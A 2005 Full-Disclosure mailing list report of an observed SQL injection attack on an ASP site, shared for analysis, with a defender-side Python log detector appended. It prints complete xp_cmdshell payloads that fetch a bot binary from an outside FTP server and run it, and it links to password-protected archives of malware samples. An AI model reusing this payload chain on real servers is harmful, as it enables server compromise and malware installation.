Hi to the list,

Today we received the same SQL injection attack on the same URL:

IP : 24.1.139.29 (c-24-1-139-29.client.comcast.net)
User Agent : none sent
HTTP Verb : GET /theasppage.asp?anID=
Attack :
377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

The lol.exe file can be found in this archive for inspection:
http://www.cybergeneration.com/security/2005.01.19/lol.zip
zip pass is das978tewa234

Norton with definitions of 12 Jan. doesn't find anything suspicious.
I'm interested if someone does an analysis on this file.

Have a nice day

Maxime Ducharme
Programmer / Network Security Specialist

----- Original Message -----
From: "Maxime Ducharme" <[EMAIL PROTECTED]>
To: <[email protected]>; "General DShield Discussion List" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Wednesday, January 05, 2005 12:22 PM
Subject: [Dshield] SQL injection worm ?

>
> Hi list,
> we received a particular SQL injection attack
> on one of our sites.
>
> Attack looks like :
> 2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET
> /Nouvelles.asp
> id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68
> %65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7
> 8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op
> en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%
> 5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%
> 68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%
> 5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..
> %78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2
> 5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C
> system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7
> 8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5
> Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%
> 78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo
> t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45
> %52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%
> 5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6
> 3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car
> cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin
> e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1
> attacked.web.site.com - - -
>
> HTTP request contains only 2 fields (beside HTTP method) :
> Connection: Keep-Alive
> Host: attacked.web.site.com
>
> (I obviously replaced the name of the site).
>
> Decoded SQL injection looks like :
> exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
> exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >>
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >>
> %systemroot%\system32\macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo get rBot.exe
> %systemroot%\system32\Macromed\lolx\arcdlrde.exe >>
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'echo quit >>
> %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell
> 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
> exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe
>
> y.y.y.y is a foreign IP in Europe which hosts FTP and WWW servers.
> I sent a notice to this site's sysadmin about the situation.
>
> I have been able to connect to this FTP with the account hahajk/hahaowned
> (which does not seem legit to me ...) and download suspicious files.
> I mirrored them here :
> http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
> zip pass is 968goyw439807r3qw
>
> 24.164.202.24 is on rr.com networks; they have also been advised.
>
> I know rbot.exe is known to be the Randex worm, but I'd like to have
> some other results / analysis.
>
> I also found a "test.asp" file which contains the Spybot worm.
>
> Weird thing is, I searched for this host's activity on every server
> and every firewall we run, and I only see 1 TCP connection, which
> is the prepared SQL injection attack, nothing else.
>
> Anybody see similar activity ?
>
> I'm asking since I want to know if we are targeted by someone or
> by a worm like Santy that uses search engines to find vulnerable
> ASP scripts.
>
> Thanks in advance
>
> Happy new year to everyone !
>
> Maxime Ducharme
> Programmer / Network Security Specialist
>

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
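As an added defender-side example (not code from the post or its author): a small Python check that percent-decodes the cs-uri-query field of IIS W3C log lines like the one quoted above and flags the hex-escaped `exec MASTER..xp_cmdshell` pattern. The sample log lines are constructed, and the field index assumes the field order of the quoted log entry.

```python
import re
from urllib.parse import unquote

# Index of cs-uri-query in the field order of the log line quoted above
# (date time c-ip cs-username s-sitename s-computername s-ip s-port
#  cs-method cs-uri-stem cs-uri-query ...). Assumed to match that layout.
QUERY_FIELD = 10

# What a defender alerts on once the query is decoded: the quote-break
# followed by exec, the MASTER..xp_cmdshell call, and the FTP script runner.
SUSPICIOUS = [
    re.compile(r"'\s*;\s*exec\b", re.I),
    re.compile(r"\bexec\s+master\s*\.\.\s*xp_cmdshell", re.I),
    re.compile(r"\bxp_cmdshell\b", re.I),
    re.compile(r"ftp\.exe\s+-i\s+-n", re.I),
]

def decode_query(query: str) -> str:
    """Percent-decode until stable: the payload above hides 'exec' and
    'xp_cmdshell' behind %XX escapes, and double encoding is common."""
    prev = None
    while prev != query:
        prev, query = query, unquote(query)
    return query

def inspect_log_line(line: str):
    """Return (flagged, decoded_query, matched_patterns) for one log line."""
    fields = line.split()
    if line.startswith("#") or len(fields) <= QUERY_FIELD:
        return False, "", []
    decoded = decode_query(fields[QUERY_FIELD])
    hits = [p.pattern for p in SUSPICIOUS if p.search(decoded)]
    return bool(hits), decoded, hits

# Constructed sample lines: the first carries a shortened copy of the encoded
# query from the post, the second is a benign request to the same script.
SAMPLE_LOG = [
    "2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp "
    "id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C"
    "%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C'-- 500 0 0 1395 570 HTTP/1.1",
    "2005-01-05 14:40:02 10.0.0.5 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp "
    "id_nouvelle=377 200 0 0 8120 310 HTTP/1.1",
]

if __name__ == "__main__":
    for raw in SAMPLE_LOG:
        flagged, decoded, hits = inspect_log_line(raw)
        print("ALERT" if flagged else "ok   ", decoded[:70], hits)
```

Note that the web server log is a fallback: the same statement also shows up in SQL Server as an xp_cmdshell call from the web application's login, which is the stronger place to alert and the right place to deny the permission.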
